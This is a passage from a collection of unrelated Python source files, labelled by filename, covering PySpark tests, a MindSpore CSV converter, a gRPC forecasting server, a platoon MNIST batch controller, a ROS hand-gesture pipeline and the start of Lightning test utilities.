class TestWorker(PySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
self.sc.parallelize(range(1)).foreach(sleep)
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
data = open(path).read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_fd_leak(self):
N = 1100 # fd limit is 1024 by default
rdd = self.sc.parallelize(range(N), N)
        self.assertEqual(N, rdd.count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(range(100), 1)
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
class TestSparkSubmit(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name + ".zip")
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out)
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
class ContextStopTests(unittest.TestCase):
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = map(gammaln, x)
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
if __name__ == "__main__":
if not _have_scipy:
print "NOTE: Skipping SciPy tests as it does not seem to be installed"
if not _have_numpy:
print "NOTE: Skipping NumPy tests as it does not seem to be installed"
unittest.main()
if not _have_scipy:
print "NOTE: SciPy tests were skipped as it does not seem to be installed"
if not _have_numpy:
print "NOTE: NumPy tests were skipped as it does not seem to be installed"
|
csv_to_mr.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Csv format convert tool for MindRecord.
"""
from importlib import import_module
import os
from mindspore import log as logger
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread
try:
pd = import_module("pandas")
except ModuleNotFoundError:
pd = None
__all__ = ['CsvToMR']
class CsvToMR:
"""
A class to transform from csv to MindRecord.
Note:
For details about Examples, please refer to `Converting CSV Dataset <https://
www.mindspore.cn/tutorials/zh-CN/master/advanced/dataset/record.html#converting-csv-dataset>`_.
Args:
source (str): The file path of csv.
destination (str): The MindRecord file path to transform into, ensure that no file with the same name
exists in the directory.
columns_list(list[str], optional): A list of columns to be read. Default: None.
        partition_number (int, optional): The number of output partitions (MindRecord files). Default: 1.
Raises:
ValueError: If `source`, `destination`, `partition_number` is invalid.
RuntimeError: If `columns_list` is invalid.
"""
def __init__(self, source, destination, columns_list=None, partition_number=1):
if not pd:
raise Exception("Module pandas is not found, please use pip install it.")
if isinstance(source, str):
check_filename(source)
self.source = source
else:
raise ValueError("The parameter source must be str.")
self._check_columns(columns_list, "columns_list")
self.columns_list = columns_list
if isinstance(destination, str):
check_filename(destination)
self.destination = destination
else:
raise ValueError("The parameter destination must be str.")
if partition_number is not None:
if not isinstance(partition_number, int):
raise ValueError("The parameter partition_number must be int")
self.partition_number = partition_number
else:
raise ValueError("The parameter partition_number must be int")
self.writer = FileWriter(self.destination, self.partition_number)
def _check_columns(self, columns, columns_name):
"""
Validate the columns of csv
"""
if not columns:
return
if isinstance(columns, list):
for col in columns:
if not isinstance(col, str):
raise ValueError("The parameter {} must be list of str.".format(columns_name))
else:
raise ValueError("The parameter {} must be list of str.".format(columns_name))
def _get_schema(self, df):
"""
Construct schema from df columns
"""
if self.columns_list:
for col in self.columns_list:
if col not in df.columns:
raise RuntimeError("The parameter columns_list is illegal, column {} does not exist.".format(col))
else:
self.columns_list = df.columns
schema = {}
for col in self.columns_list:
if str(df[col].dtype) == 'int64':
schema[col] = {"type": "int64"}
elif str(df[col].dtype) == 'float64':
schema[col] = {"type": "float64"}
elif str(df[col].dtype) == 'bool':
schema[col] = {"type": "int32"}
else:
schema[col] = {"type": "string"}
if not schema:
raise RuntimeError("Failed to generate schema from csv file.")
return schema
def _get_row_of_csv(self, df, columns_list):
"""Get row data from csv file."""
for _, r in df.iterrows():
row = {}
for col in columns_list:
if str(df[col].dtype) == 'bool':
row[col] = int(r[col])
else:
row[col] = r[col]
yield row
def run(self):
"""
Execute transformation from csv to MindRecord.
Returns:
MSRStatus, SUCCESS or FAILED.
"""
if not os.path.exists(self.source):
raise IOError("Csv file {} do not exist.".format(self.source))
pd.set_option('display.max_columns', None)
df = pd.read_csv(self.source)
csv_schema = self._get_schema(df)
logger.info("transformed MindRecord schema is: {}".format(csv_schema))
# set the header size
self.writer.set_header_size(1 << 24)
# set the page size
self.writer.set_page_size(1 << 26)
# create the schema
self.writer.add_schema(csv_schema, "csv_schema")
# add the index
self.writer.add_index(list(self.columns_list))
csv_iter = self._get_row_of_csv(df, self.columns_list)
batch_size = 256
transform_count = 0
while True:
data_list = []
try:
for _ in range(batch_size):
data_list.append(csv_iter.__next__())
transform_count += 1
self.writer.write_raw_data(data_list)
logger.info("transformed {} record...".format(transform_count))
except StopIteration:
if data_list:
self.writer.write_raw_data(data_list)
logger.info(
"transformed {} record...".format(transform_count))
break
ret = self.writer.commit()
return ret
def transform(self):
"""
Encapsulate the run function to exit normally.
Returns:
MSRStatus, SUCCESS or FAILED.
"""
t = ExceptionThread(target=self.run)
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
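# A minimal usage sketch (the file paths are hypothetical, and this assumes the
# package exposes the class as mindspore.mindrecord.CsvToMR):
#
#     from mindspore.mindrecord import CsvToMR
#
#     csv_to_mr = CsvToMR("input.csv", "output.mindrecord", columns_list=None,
#                         partition_number=1)
#     csv_to_mr.transform()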
|
server.py
|
from concurrent import futures
from forecaster.prophet import Forecaster as ProphetForecaster
from multiprocessing import Event, Process, cpu_count
from pythonjsonlogger import jsonlogger
import contextlib
import grpc
import logging
import model.api.forecast_pb2_grpc as grpc_lib
import os
import signal
import socket
import sys
import time
class ForecastServicer(ProphetForecaster):
def __init__(self, logger):
self.logger = logger
def pretty_timedelta(self, seconds):
seconds = int(seconds)
days, seconds = divmod(seconds, 86400)
hours, seconds = divmod(seconds, 3600)
minutes, seconds = divmod(seconds, 60)
if days > 0:
return '{:d}d{:d}h{:d}m{:d}s'.format(days, hours, minutes, seconds)
elif hours > 0:
return '{:d}h{:d}m{:d}s'.format(hours, minutes, seconds)
elif minutes > 0:
return '{:d}m{:d}s'.format(minutes, seconds)
else:
return '{:d}s'.format(seconds)
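        # e.g. pretty_timedelta(90061) -> '1d1h1m1s', pretty_timedelta(61) -> '1m1s'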
class GracefulShutdown:
def __init__(self, logger):
self.logger = logger
self.event = Event()
signal.signal(signal.SIGINT, self.handler('SIGINT'))
signal.signal(signal.SIGTERM, self.handler('SIGTERM'))
signal.signal(signal.SIGHUP, self.handler('SIGHUP'))
def handler(self, signal_name):
def fn(signal_received, frame):
self.logger.info('signal received', extra={'signal': signal_name})
self.event.set()
return fn
class Config(object):
def __init__(self):
self.grpc_server_address = os.getenv('GRPC_SERVER_ADDRESS', '')
self.grpc_server_key = str.encode(os.getenv('GRPC_SERVER_KEY', ''))
self.grpc_server_cert = str.encode(os.getenv('GRPC_SERVER_CERT', ''))
self.grpc_root_ca = str.encode(os.getenv('GRPC_ROOT_CA', ''))
        self.grpc_server_process_num = int(os.getenv('GRPC_SERVER_PROCESS_NUM', cpu_count()))
self.grpc_server_thread_num = int(os.getenv('GRPC_SERVER_THREAD_NUM', 1))
self.grpc_server_grace_period_in_secs = int(os.getenv('GRPC_SERVER_GRACE_PERIOD_IN_SECS', 2))
self.grpc_server_kill_period_in_secs = int(os.getenv('GRPC_SERVER_KILL_PERIOD_IN_SECS', 5))
class Server(object):
def __init__(self, config, logger):
self.config = config
self.logger = logger
@contextlib.contextmanager
def _reserve_port(self):
"""Find and reserve a port for all subprocesses to use"""
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT) == 0:
raise RuntimeError('failed to set SO_REUSEPORT.')
_, port = self.config.grpc_server_address.split(':')
sock.bind(('', int(port)))
try:
yield sock.getsockname()[1]
finally:
sock.close()
def _run_server(self, shutdown_event):
server_credentials = grpc.ssl_server_credentials(
[(self.config.grpc_server_key, self.config.grpc_server_cert)],
root_certificates=self.config.grpc_root_ca,
require_client_auth=True
)
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=self.config.grpc_server_thread_num),
options=[
("grpc.so_reuseport", 1),
("grpc.use_local_subchannel_pool", 1),
],
)
grpc_lib.add_ForecastServicer_to_server(ForecastServicer(self.logger), server)
server.add_secure_port(self.config.grpc_server_address, server_credentials)
self.logger.info('starting python gRPC server...')
server.start()
while not shutdown_event.is_set():
time.sleep(1)
server.stop(5).wait()
self.logger.info('python gRPC server stopped')
def serve(self):
with self._reserve_port():
procs = []
shutdown = GracefulShutdown(self.logger)
            for _ in range(self.config.grpc_server_process_num):
proc = Process(target=self._run_server, args=(shutdown.event,))
procs.append(proc)
proc.start()
while not shutdown.event.is_set():
time.sleep(1)
t = time.time()
grace_period = self.config.grpc_server_grace_period_in_secs
kill_period = self.config.grpc_server_kill_period_in_secs
while True:
                # Send SIGTERM if a process doesn't exit quickly enough, and SIGKILL as a last resort.
                # .is_alive() also implicitly joins any process that has already exited.
alive_procs = [proc for proc in procs if proc.is_alive()]
if len(alive_procs) == 0:
break
elapsed = time.time() - t
if elapsed >= grace_period and elapsed < kill_period:
for proc in alive_procs:
proc.terminate()
self.logger.info("sending SIGTERM to subprocess", extra={'proc': proc})
elif elapsed >= kill_period:
for proc in alive_procs:
self.logger.warning("sending SIGKILL to subprocess", extra={'proc': proc})
# Queues and other inter-process communication primitives can break when
# process is killed, but we don't care here
proc.kill()
time.sleep(1)
time.sleep(1)
for proc in procs:
self.logger.info("subprocess terminated", extra={'proc': proc})
def json_logger():
logger = logging.getLogger()
log_handler = logging.StreamHandler(sys.stdout)
formatter = jsonlogger.JsonFormatter(fmt='%(asctime)s %(name)s %(levelname)s %(message)s')
log_handler.setFormatter(formatter)
log_handler.flush = sys.stdout.flush
logger.setLevel(logging.INFO)
logger.addHandler(log_handler)
return logger
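# A minimal wiring sketch for running the server; it assumes the GRPC_* (and
# process/thread count) environment variables read by Config above are set.
if __name__ == '__main__':
    logger = json_logger()
    config = Config()
    Server(config, logger).serve()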
|
batched_pixel_sum_controller.py
|
from __future__ import absolute_import, print_function
import os
import sys
import gzip
import time
import six
from six.moves import cPickle
from multiprocessing import Process
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from platoon.channel import Controller
class BatchedPixelSumController(Controller):
def __init__(self, batch_port, dataset, batch_size, default_args):
super(BatchedPixelSumController, self).__init__(**default_args)
        # The data socket should be initialized in the process that will serve
        # the batches (see _send_mb), which is why it is not opened here in the
        # parent constructor.
self._batch_port = batch_port
self._start_time = None
self._should_stop = False
self._batch_size = batch_size
self._dataset = dataset
self._nb_batch_processed = 0
self._nb_batch_to_process = (dataset.shape[0] // batch_size)
def start_batch_server(self):
self.p = Process(target=self._send_mb)
self.p.start()
def _send_mb(self):
self.init_data(self._batch_port)
for i in range(self._dataset.shape[0] // self._batch_size):
batch_start = i * self._batch_size
batch_stop = (i + 1) * self._batch_size
self.send_mb(self._dataset[batch_start:batch_stop])
self.asocket.close()
print("Done Sending MB.")
        # TODO: Find a better solution than sleeping here.
        # Sleep to give the worker a chance to empty the queue before the
        # mini-batch process dies.
time.sleep(2)
def handle_control(self, req, worker_id, req_info):
print("# Handling req: {}".format(req))
control_response = ''
if req == 'next':
if not self._should_stop:
# Start a global execution timer
if self._start_time is None:
self._start_time = time.time()
control_response = 'train'
else:
control_response = 'stop'
elif req == 'get_data_shape':
control_response = self._dataset[0].shape
elif req == 'done':
self._nb_batch_processed += req_info['num_batches']
print("{} batches processed by worker so far."
.format(self._nb_batch_processed))
if self._nb_batch_processed >= self._nb_batch_to_process:
if not self._should_stop:
print("Training time {:.4f}s".format(
time.time() - self._start_time))
self._should_stop = True
return control_response
def parse_arguments():
parser = Controller.default_parser()
parser.add_argument('--batch_port', default=5566, type=int, required=False,
                        help='Port on which the batches will be transferred.')
parser.add_argument('--batch-size', default=1000, type=int, required=False,
help='Size of the batches.')
return parser.parse_args()
def get_mnist(path):
import os
from six.moves import urllib
if not os.path.exists(path):
print("Downloading mnist ...", end=' ')
url = "http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz"
urllib.request.urlretrieve(url, path)
print("Done")
def spawn_controller():
args = parse_arguments()
mnist_path = "../data/mnist.pkl.gz"
get_mnist(mnist_path)
with gzip.open(mnist_path, 'rb') as f:
kwargs = {}
if six.PY3:
kwargs['encoding'] = 'latin1'
train_set, _, _ = cPickle.load(f, **kwargs)
controller = BatchedPixelSumController(batch_port=args.batch_port,
dataset=train_set[0],
batch_size=args.batch_size,
default_args=Controller.default_arguments(args))
controller.start_batch_server()
return controller.serve()
if __name__ == '__main__':
rcode = spawn_controller()
if rcode != 0:
sys.exit(rcode)
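# Invocation sketch (a hypothetical command line; any further arguments come
# from Controller.default_parser() and depend on the platoon setup):
#
#     python batched_pixel_sum_controller.py --batch_port 5566 --batch-size 1000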
|
External_Processing.py
|
#!/usr/bin/env python
import cv2
import numpy as np
from utils import detector_utils as detector_utils
from utils import gesture_utils as gesture_utils
import datetime
from multiprocessing import Queue
import threading
import roslib
import rospy
import sys, time, os
from sensor_msgs.msg import CompressedImage
from std_msgs.msg import Int32MultiArray
import csv
import tensorflow as tf
#Display processed frames for debugging
DISPLAY_OUTPUT = True
#Write recorded hand paths to datafile for testing
RECORD_PATHS = False
#Write recorded paths to datafile with the gesture predicted by the network
PREDICT_GESTURE = False
#Track processing speed
TRACK_FPS = False
#Save output frames to video file
SAVE_OUTPUT = False
NUM_THREADS = 4
INPUT_QUEUE_SIZE = 1
output_path = 'output.avi'
input_lock = threading.Lock()
input_cv = threading.Condition(input_lock)
frame_lock = threading.Lock()
frame_cv = threading.Condition(frame_lock)
next_frame = 0 #Tracks the current frame number to reconstruct output in original order
TERMINATE = False
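# Pipeline overview: FrameProcessor subscribes to the compressed image topic and
# feeds input_q; the Worker threads run the hand detector on each frame and push
# their results to worker_q in frame order; the Assembler turns detections into
# gesture predictions and publishes them on the "gesture" topic.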
#Worker calls all functions to obtain the estimated gesture
def Assembler(worker_q, worker_frame_q, cap_params):
global DISPLAY_OUTPUT
global RECORD_PATHS
global PREDICT_GESTURE
global TERMINATE
global SAVE_OUTPUT, output_path
global next_frame
print("Assembler started!")
    prediction = [4,4] #Initialize prediction
prev_prediction = [4, 4]
#Load network to recognize gestures
model = gesture_utils.load_net(os.path.abspath(os.getcwd()))
#Initialize lastPos and lastOutput with default values
lastPos, lastOutput = gesture_utils.initialize()
start_time = None
frameCounter = 0 #To count elapsed frame
idleTimer = time.time()
PROCESSING = False
    processing_stats = [[0,0,0],[0,0,0],[0,0,0],[0,0,0]] #[total time, total frames, fps] for: all frames, frames with 0 hands, frames with 2 hands, frames with 1 hand
publisher = rospy.Publisher("gesture", Int32MultiArray, queue_size=1)
if SAVE_OUTPUT:
out = cv2.VideoWriter(output_path,cv2.VideoWriter_fourcc('M','J','P','G'),24,(int(cap_params['im_width']),int(cap_params['im_height'])))
while not (PROCESSING and (time.time() - idleTimer) > 10): #After starting, the Assembler exits after not receiving new info for 10 seconds
if not worker_q.empty():
PROCESSING = True #Becomes true when at least one frame has been received
idleTimer = time.time()
#print("Assembler acquired frame")
if start_time == None and TRACK_FPS: #Note time the first frame is processed
start_time = time.time()
#Obtain access to queue of worker output
frame_cv.acquire()
if DISPLAY_OUTPUT or SAVE_OUTPUT:
image_np = worker_frame_q.get()
worker_output = worker_q.get()
next_frame += 1
frame_cv.notifyAll()
frame_cv.release()
boxes = worker_output[0]
scores = worker_output[1]
positions = gesture_utils.find_hands(boxes, scores, cap_params) #Obtain center positions of max 2 most probable hands
if(len(positions) > 0): #If at least one hand is detected
lastPos, added_pos = gesture_utils.update_lastpos(positions,lastPos) #Append new position to closest previous position to keep hands separate
prediction, lastOutput, meanx, meany, predicted_gestures_raw = gesture_utils.predict_gestures(lastPos, cap_params,model, lastOutput, added_pos) #Obtain predicted gesture based on new input
print('Prediction: ' + str(prediction))
if prev_prediction[0] != prediction[0]:
print(prediction[0])
response = Int32MultiArray()
response.data = [prediction[0]]
publisher.publish(response)
prev_prediction[0] = prediction[0]
if prev_prediction[1] != prediction[1]:
response = Int32MultiArray()
response.data = [prediction[1]]
publisher.publish(response)
prev_prediction[1] = prediction[1]
if RECORD_PATHS: #If paths need to be recorded to CSV file
gesture_utils.write_path_to_datafile(lastPos, cap_params, meanx, meany, added_pos, predicted_gestures_raw, PREDICT_GESTURE)
if TRACK_FPS: #Track overall FPS as well as on specific cases
frame_time = time.time()-start_time
processing_stats[0][0] += frame_time
processing_stats[0][1] += 1
if len(positions) == 0:
processing_stats[1][0] += frame_time
processing_stats[1][1] += 1
elif len(positions) == 2:
processing_stats[2][0] += frame_time
processing_stats[2][1] += 1
else:
processing_stats[3][0] += frame_time
processing_stats[3][1] += 1
start_time = time.time()
if DISPLAY_OUTPUT or SAVE_OUTPUT: #If output frame should be created
image_np = gesture_utils.construct_output(image_np, cap_params, lastPos, prediction, scores, boxes) #Draw output frame with additional data to screen
if SAVE_OUTPUT:
out.write(image_np)
if DISPLAY_OUTPUT:
cv2.imshow('detected hands', image_np)
if cv2.waitKey(1) & 0xFF == ord('q'):
TERMINATE = True
pass
if processing_stats[0][1] - frameCounter == 10 and TRACK_FPS: #Update FPS and display
for i in range(0, len(processing_stats)):
if processing_stats[i][0] > 0:
processing_stats[i][2] = processing_stats[i][1] / processing_stats[i][0]
print(processing_stats)
frameCounter = processing_stats[0][1]
print('Assembler exiting')
TERMINATE = True
try:
input_cv.notifyAll()
except:
pass
if SAVE_OUTPUT:
out.release()
def Worker(input_q, frameNumber_q, worker_q, worker_frame_q, id):
global TERMINATE
idleTimer = time.time() #Saves time at start of last frame
PROCESSING = False #Indicates a video stream is being processed
msg_timer = time.time()
#Load hand recognition graph
detection_graph, sess = detector_utils.load_inference_graph()
while not (PROCESSING and (time.time() - idleTimer) > 10):
if not input_q.empty():
PROCESSING = True #Becomes true when at least one frame has been received
idleTimer = time.time()
input_cv.acquire()
while input_q.empty():
if TERMINATE:
input_cv.release()
break
input_cv.wait()
if TERMINATE:
break
image_np = input_q.get()
frameNumber = frameNumber_q.get()
input_cv.notifyAll()
input_cv.release()
image_np = cv2.cvtColor(image_np, cv2.COLOR_BGR2RGB) #Convert frame to correct color format
boxes, scores = detector_utils.detect_objects(image_np, detection_graph, sess) #Detect hands
frame_cv.acquire()
while frameNumber != next_frame:
frame_cv.wait()
worker_q.put([boxes, scores])
if DISPLAY_OUTPUT or SAVE_OUTPUT:
worker_frame_q.put(image_np)
frame_cv.release()
print("Worker "+str(id)+" exited")
class FrameProcessor:
frameNumber = 0
def __init__(self, input_q, frameNumber_q):
#self.detection_graph, self.sess = detector_utils.load_inference_graph()
self.receiver = rospy.Subscriber("compressed_image", CompressedImage, self.callback, queue_size=1)
self.input_q = input_q
self.frameNumber_q = frameNumber_q
        self.output_q = output_q #Module-level queue created in __main__
        self.frameNumber = 0
def callback(self, ros_data):
#Prepare incoming frame
        img = np.frombuffer(ros_data.data, np.uint8) #np.fromstring is deprecated for binary data
img = cv2.imdecode(img, cv2.IMREAD_COLOR)
input_cv.acquire()
while input_q.qsize() >= INPUT_QUEUE_SIZE:
input_cv.wait()
input_q.put(img)
frameNumber_q.put(self.frameNumber)
input_cv.notifyAll()
input_cv.release()
self.frameNumber += 1
if __name__ == '__main__':
if RECORD_PATHS:
gesture_utils.initialize_datafile() #Initialize datafile if it does not exist yet
#Initialize queues
input_q = Queue(maxsize=INPUT_QUEUE_SIZE)
frameNumber_q = Queue(maxsize=INPUT_QUEUE_SIZE)
worker_q = Queue(maxsize=2)
worker_frame_q = Queue(maxsize=2)
output_q = Queue(maxsize=2)
#Create callback for when a frame comes in
fp = FrameProcessor(input_q, frameNumber_q)
rospy.init_node('Hand_detection_processing', anonymous=True)
#Initialize parameters
cap_params = {}
cap_params['im_width'] = 320
cap_params['im_height'] = 180
cap_params['score_thresh'] = 0.2
cap_params['num_hands_detect'] = 2
#Create and start worker thread(s)
worker_threads = []
for i in range(0,NUM_THREADS):
worker_threads.append(threading.Thread(target=Worker, args=(input_q, frameNumber_q, worker_q, worker_frame_q, i)))
worker_threads[i].start()
#Run assembler
Assembler(worker_q, worker_frame_q, cap_params)
#Clean up worker threads
for i in range(0, len(worker_threads)):
worker_threads[i].join()
cv2.destroyAllWindows()
sys.exit()
|
utils.py
|
from bitcoin.rpc import RawProxy as BitcoinProxy
from btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve
from lightning import LightningRpc
import json
import logging
import lzma
import os
import random
import re
import shutil
import sqlite3
import string
import subprocess
import threading
import time
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
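# config.vars contains one KEY=VALUE pair per line; it supplies the defaults
# for the environment-variable flags below.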
with open('config.vars') as configfile:
config = dict([(line.rstrip().split('=', 1)) for line in configfile])
DEVELOPER = os.getenv("DEVELOPER", config['DEVELOPER']) == "1"
EXPERIMENTAL_FEATURES = os.getenv("EXPERIMENTAL_FEATURES", config['EXPERIMENTAL_FEATURES']) == "1"
TIMEOUT = int(os.getenv("TIMEOUT", "60"))
VALGRIND = os.getenv("VALGRIND", config['VALGRIND']) == "1"
SLOW_MACHINE = os.getenv("SLOW_MACHINE", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def write_config(filename, opts, regtest_opts=None):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[regtest]\n")
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self):
"""Start the underlying process and start monitoring it.
"""
